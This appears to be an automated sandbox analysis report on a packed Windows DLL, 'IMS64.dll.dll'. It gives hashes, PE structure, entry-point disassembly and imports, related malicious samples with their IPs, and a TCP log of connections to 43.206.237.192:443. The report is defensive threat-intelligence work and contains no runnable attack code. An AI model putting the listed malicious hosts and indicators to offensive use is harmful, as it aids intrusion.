LILLY-ASUS	SecuriteInfo.com.Riskware.2144FlashPlayer.13074.5713.exe	Get hash	malicious	Unknown	Browse	43.175.151.206
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	43.135.99.21
	http://www.samyinyue.com/fr.php	Get hash	malicious	Unknown	Browse	43.139.0.203
	z64wAoCD5w.exe	Get hash	malicious	Unknown	Browse	43.198.160.119
	http://battlegrounds-bgmi-reward.events-games.com/	Get hash	malicious	Unknown	Browse	43.128.103.195
	sora.m68k.elf	Get hash	malicious	Unknown	Browse	40.49.125.62
	sora.mpsl.elf	Get hash	malicious	Unknown	Browse	43.187.79.88
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	43.61.74.42
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	43.136.5.202
	sora.arm.elf	Get hash	malicious	Unknown	Browse	43.203.14.244

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Payment_Advice.exe	Get hash	malicious	FormBook, GuLoader	Browse	43.206.237.192
	Apponde2.exe	Get hash	malicious	AveMaria, UACMe, XRed	Browse	43.206.237.192
	file.exe	Get hash	malicious	Meduza Stealer	Browse	43.206.237.192
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	43.206.237.192
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	43.206.237.192
	x64_x32_installer__v4.4.9.msi	Get hash	malicious	Unknown	Browse	43.206.237.192
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	43.206.237.192
	Setup.exe	Get hash	malicious	Vidar	Browse	43.206.237.192
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	43.206.237.192
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	43.206.237.192

File type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.954168963281946
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	IMS64.dll.dll
File size:	270'336 bytes
MD5:	4a10fb513a346ffdca884fa74cf18015
SHA1:	623b8046938fd54fae54957ece8c7ff40653217b
SHA256:	079e3171048286472cff2b0267cd2d6a90bf9d7f45255f48031bf4bf2ac3b0b4
SHA512:	00931f752966cdcab894ca86301d12ac3ce06781e0fe9220054eb475770fda0aa8f58f863fab5225d2b8566fd7afe4aed69a56d2e791b590c0445305c479802f
SSDEEP:	6144:M7tLKV/ZQEhoEo9/+CvLMtvs137aaaDnka/za1C/:M7t8WE+/xvcvs1EDkaz
TLSH:	4E4412097AAAE4BCCE57D4F9056DE531643F31069C1C86B81E82E0373E677D835BA98C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...!..f..........."...)............@.....................................................`... ............................

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x205d51340
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x205d50000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66CD9421 [Tue Aug 27 08:53:53 2024 UTC]
TLS Callbacks:	0x5d514f0, 0x2, 0x5d514c0, 0x2
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	df00652ad3e78ba777ba702462655cf8

Entrypoint Preview

Instruction
dec eax
mov eax, dword ptr [00040F09h]
mov dword ptr [eax], 00000000h
jmp 00007F0C98E08BE3h
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
mov edx, ecx
dec eax
lea ecx, dword ptr [00043C96h]
jmp 00007F0C98E09C06h
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F0C98E08D39h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp 00007F0C98E08D6Eh
jmp 00007F0C98E08D60h
jmp 00007F0C98E08D54h
jmp 00007F0C98E08D74h
dec ecx
mov edx, ecx
dec esp
mov eax, ecx
jmp dword ptr [esp+28h]
dec ecx
mov edx, ecx
dec eax
mov eax, dword ptr [esp+30h]
jmp dword ptr [esp+38h]
dec ecx
mov edx, ecx
dec eax
mov eax, dword ptr [esp+38h]
jmp dword ptr [esp+40h]
dec ecx
mov edx, ecx
dec eax
mov eax, dword ptr [esp+60h]
jmp dword ptr [esp+68h]
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00001C21h]
dec eax
mov eax, dword ptr [eax]
dec eax
test eax, eax
je 00007F0C98E08D78h
nop word ptr [eax+eax+00000000h]
call eax
dec eax
mov eax, dword ptr [00001C07h]
dec eax
lea edx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [eax+08h]
dec eax
mov dword ptr [00001BF8h], edx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x46000	0x44	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47000	0x368	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x43000	0x21c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4a000	0x5c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x42020	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x47100	0xc0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1888	0x1a00	079ade57fd7fd5e198c51331a35526be	False	0.5805288461538461	data	6.02656266342615	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3000	0x3eb10	0x3ec00	454de6321f3862ae7d413163eae1d781	False	0.9868455864043825	data	7.996663236311901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x42000	0x2d0	0x400	c21c59646630f5eb61510c7eddaca0ba	False	0.3046875	SysEx File - PalmTree	3.034549702627992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x43000	0x21c	0x400	66906a84b4648d7bf40a0990306889bd	False	0.30859375	data	2.538723940112595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x44000	0x1a8	0x200	824eb5e2c7ac801453ef1cb7eb2f6f36	False	0.396484375	data	3.773379184135226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x45000	0xe0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x46000	0x44	0x200	f169a4118c3d97251f615ae507476e4c	False	0.126953125	data	0.7488638911136207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x47000	0x368	0x400	3e867741b92470d9e2567176d80b2eff	False	0.34765625	data	3.4698558599248295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x48000	0x58	0x200	6ff5386daed93bbd1da1f406c45de42b	False	0.05859375	data	0.25323120180391656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x49000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x4a000	0x5c	0x200	02d981ee66f68254a25fff07cccdeb7a	False	0.1796875	data	1.0043269309123346	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll	__iob_func, _amsg_exit, _initterm, _lock, _unlock, abort, calloc, free, fwrite, realloc, strlen, strncmp, vfprintf

Exports

Name	Ordinal	Address
main	1	0x205d525e0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 13:37:57.789480925 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.789513111 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:57.789572001 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.804466009 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.804506063 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:57.804563999 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.828502893 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.828516006 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:57.838118076 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:57.838135004 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.701853037 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.701987982 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.704580069 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.704668045 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.778304100 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.778316975 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.779361010 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.779426098 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.781238079 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.795020103 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.795042992 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.795346022 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.795386076 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.797826052 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:58.824496984 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:58.844494104 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.126604080 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.126682043 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.126866102 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.127101898 CEST	49731	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.127115011 CEST	443	49731	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.142712116 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.142791986 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.142802954 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.142863035 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.142877102 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.142904997 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.143062115 CEST	49730	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.143074036 CEST	443	49730	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.155944109 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.155966997 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.156063080 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.156255960 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.156269073 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.157063007 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.157078028 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.157160997 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.157316923 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.157326937 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.940629959 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.940737009 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.960962057 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.961091995 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.961817026 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.961824894 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.963102102 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.963108063 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.963488102 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.963496923 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:37:59.964533091 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:37:59.964538097 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.371902943 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.371997118 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.372020960 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.372036934 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.372075081 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.372093916 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.382185936 CEST	49732	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.382205009 CEST	443	49732	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.397471905 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.397541046 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.397546053 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.397592068 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.399027109 CEST	49733	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.399043083 CEST	443	49733	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.539830923 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.539885044 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:00.539987087 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.545834064 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:00.545846939 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.466993093 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.467093945 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.540112972 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.540142059 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.540527105 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.540683031 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.542192936 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.588511944 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.920270920 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.920380116 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.920418978 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.920445919 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.920463085 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.920494080 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.920845032 CEST	49734	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.920866013 CEST	443	49734	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.922096968 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.922138929 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:01.922239065 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.922471046 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:01.922487974 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:02.739522934 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:02.739720106 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:02.756964922 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:02.756974936 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:02.797823906 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:02.797846079 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:03.188900948 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:03.188961983 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:03.188977957 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:03.188993931 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:03.189023972 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:03.189045906 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:03.225919008 CEST	49735	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:03.225940943 CEST	443	49735	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:23.301357985 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:23.301399946 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:23.301475048 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:23.301712036 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:23.301728010 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.114377022 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.114528894 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.115145922 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.115158081 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.124083996 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.124092102 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.551552057 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.551640034 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.551654100 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.551701069 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.551721096 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:24.551764011 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.552395105 CEST	49742	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:24.552408934 CEST	443	49742	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:29.709765911 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.709791899 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:29.709852934 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.710675001 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.710691929 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:29.710750103 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.717107058 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.717122078 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:29.717344046 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:29.717355967 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.722275972 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.722368002 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.722882032 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.722887039 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.731131077 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.731136084 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.744163036 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.744271994 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.744647026 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.744658947 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:30.752723932 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:30.752728939 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.158726931 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.158787012 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.158834934 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.158885002 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.159097910 CEST	49744	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.159106970 CEST	443	49744	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.192913055 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.193003893 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:31.193015099 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.193054914 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.193237066 CEST	49743	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:31.193247080 CEST	443	49743	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:36.575401068 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:36.575409889 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:36.575602055 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:36.575833082 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:36.575845003 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.385302067 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.385374069 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:37.385886908 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:37.385891914 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.387120008 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:37.387131929 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.837740898 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.837826014 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:37.837835073 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.837881088 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:37.837899923 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:37.837980032 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:38.080738068 CEST	49745	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:38.080754995 CEST	443	49745	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:59.295489073 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:59.295526981 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:38:59.295595884 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:59.296138048 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:38:59.296149969 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.118809938 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.118900061 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.120098114 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.120104074 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.121316910 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.121321917 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.574177980 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.574244976 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.574255943 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.574270010 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:00.574299097 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.574314117 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.575495958 CEST	49747	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:00.575505972 CEST	443	49747	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.185379028 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.185410023 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.185488939 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.185776949 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.185791016 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.247813940 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.247843981 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.247915030 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.248322964 CEST	49749	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.248337984 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.979377985 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.979487896 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.980503082 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.980509043 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:01.984163046 CEST	49748	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:39:01.984169006 CEST	443	49748	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.051650047 CEST	443	49749	43.206.237.192	192.168.2.4
Aug 28, 2024 13:39:02.051783085 CEST	49749	443	192.168.2.4	43.206.237.192
